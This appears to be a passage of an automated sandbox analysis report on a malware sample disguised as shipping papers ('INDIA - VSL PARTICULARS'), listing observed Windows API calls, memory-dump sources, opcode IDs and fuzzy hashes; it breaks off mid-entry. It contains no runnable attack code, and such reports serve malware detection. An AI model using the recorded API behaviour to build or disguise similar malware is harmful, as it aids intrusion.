                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: $<
                              • API String ID: 4104443479-428540627
                              • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                              • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                              • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                              • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                              • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                              • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                              • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                              • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                              • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                              • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$DiskFreeSpace
                              • String ID: \VH
                              • API String ID: 1682464887-234962358
                              • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                              • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                              • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                              • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume
                              • String ID: \VH
                              • API String ID: 2507767853-234962358
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume
                              • String ID: \VH
                              • API String ID: 2507767853-234962358
                              APIs
                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                              • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID: msctls_trackbar32
                              • API String ID: 3850602802-1010561917
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                              • String ID: crts
                              • API String ID: 943502515-3724388283
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                              • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                              • SetErrorMode.KERNEL32(?), ref: 0045D35C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorMode$LabelVolume
                              • String ID: \VH
                              • API String ID: 2006950084-234962358
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetMenuItemInfoW.USER32 ref: 00449727
                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                              • DrawMenuBar.USER32 ref: 00449761
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$InfoItem$Draw_malloc
                              • String ID: 0
                              • API String ID: 772068139-4108050209
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$_wcscpy
                              • String ID: 3, 3, 8, 1
                              • API String ID: 3469035223-357260408
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                              • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpCloseHandle
                              • API String ID: 2574300362-3530519716
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpCreateFile
                              • API String ID: 2574300362-275556492
                              APIs
                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: ICMP.DLL$IcmpSendEcho
                              • API String ID: 2574300362-58917771
                              APIs
                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: RegDeleteKeyExW$advapi32.dll
                              • API String ID: 2574300362-4033151799
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 0047950F
                              • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                              • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                              • VariantClear.OLEAUT32(?), ref: 00479650
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$AllocClearCopyInitString
                              • API String ID: 2808897238-0
                              APIs
                              • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                              • __itow.LIBCMT ref: 004699CD
                                • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                              • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                              • __itow.LIBCMT ref: 00469A97
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSend$__itow
                              • String ID:
                              • API String ID: 3379773720-0
                              • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                              • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                              • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                              • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                              APIs
                              • GetWindowRect.USER32(?,?), ref: 00449A4A
                              • ScreenToClient.USER32(?,?), ref: 00449A80
                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                              Similarity
                              • API ID: Window$ClientMoveRectScreen
                              • String ID:
                              • API String ID: 3880355969-0
                              • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                              • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                              • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                              • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                              APIs
                              Similarity
                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                              • String ID:
                              • API String ID: 2782032738-0
                              • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                              • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                              • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                              • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                              APIs
                              • ClientToScreen.USER32(00000000,?), ref: 0044169A
                              • GetWindowRect.USER32(?,?), ref: 00441722
                              • PtInRect.USER32(?,?,?), ref: 00441734
                              • MessageBeep.USER32(00000000), ref: 004417AD
                              Similarity
                              • API ID: Rect$BeepClientMessageScreenWindow
                              • String ID:
                              • API String ID: 1352109105-0
                              • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                              • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                              • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                              • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                              APIs
                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                              • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                              • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                              Similarity
                              • API ID: CreateHardLink$DeleteErrorFileLast
                              • String ID:
                              • API String ID: 3321077145-0
                              • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                              • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                              • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                              • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                              • __isleadbyte_l.LIBCMT ref: 004208A6
                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                              • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                              • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                              • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                              APIs
                              • GetParent.USER32(?), ref: 004503C8
                              • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                              • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                              • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                              Similarity
                              • API ID: Proc$Parent
                              • String ID:
                              • API String ID: 2351499541-0
                              • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                              • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                              • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                              • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                              • TranslateMessage.USER32(?), ref: 00442B01
                              • DispatchMessageW.USER32(?), ref: 00442B0B
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                              Similarity
                              • API ID: Message$Peek$DispatchTranslate
                              • String ID:
                              • API String ID: 1795658109-0
                              • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                              • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                              • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                              • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                              APIs
                              • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                              • GetCaretPos.USER32(?), ref: 004743B2
                              • ClientToScreen.USER32(00000000,?), ref: 004743E8
                              • GetForegroundWindow.USER32 ref: 004743EE
                              Similarity
                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                              • String ID:
                              • API String ID: 2759813231-0
                              • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                              • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                              • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                              • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                              APIs
                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                              • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                              • _wcslen.LIBCMT ref: 00449519
                              • _wcslen.LIBCMT ref: 00449526
                              Similarity
                              • API ID: MessageSend_wcslen$_wcspbrk
                              • String ID:
                              • API String ID: 2886238975-0
                              • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                              • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                              • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                              • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                              APIs
                              Similarity
                              • API ID: __setmode$DebugOutputString_fprintf
                              • String ID:
                              • API String ID: 1792727568-0
                              • Opcode ID: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                              • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                              • Opcode Fuzzy Hash: 01580405df331f4a09227751ba67227c0781ee584fffe640c61a9ab7dbe43ce0
                              • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                              APIs
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                              Similarity
                              • API ID: Window$Long$AttributesLayered
                              • String ID:
                              • API String ID: 2169480361-0
                              • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                              • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                              • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                              • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                              APIs
                                • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                              • lstrlenW.KERNEL32(?), ref: 00434CF6
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                              • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                              Strings
                              Similarity
                              • API ID: lstrcmpilstrcpylstrlen$_malloc
                              • String ID: cdecl
                              • API String ID: 3850814276-3896280584
                              • Opcode ID: 5248fcd12fa573e8471e03ef3ffe1589e610c1ecd3e4c73a3bae80ffd9d943a4
                              • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                              • Opcode Fuzzy Hash: 5248fcd12fa573e8471e03ef3ffe1589e610c1ecd3e4c73a3bae80ffd9d943a4
                              • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                              APIs
                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                              • gethostbyname.WSOCK32(?), ref: 0046D42D
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                              • _memmove.LIBCMT ref: 0046D475
                              • inet_ntoa.WSOCK32(?), ref: 0046D481
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                              • String ID:
                              • API String ID: 2502553879-0
                              • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                              • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                              • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                              • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                              APIs
                              • SendMessageW.USER32 ref: 00448C69
                              • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                              • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                              Similarity
                              • API ID: MessageSend$LongWindow
                              • String ID:
                              • API String ID: 312131281-0
                              • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                              • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                              • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                              • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                              APIs
                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                              • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                              Similarity
                              • API ID: ErrorLastacceptselect
                              • String ID:
                              • API String ID: 385091864-0
                              • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                              • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                              • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                              • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                              APIs
                              • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                              • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                              • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                              • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                              APIs
                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                              • GetStockObject.GDI32(00000011), ref: 00430258
                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                              • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                              Similarity
                              • API ID: Window$CreateMessageObjectSendShowStock
                              • String ID:
                              • API String ID: 1358664141-0
                              • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                              • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
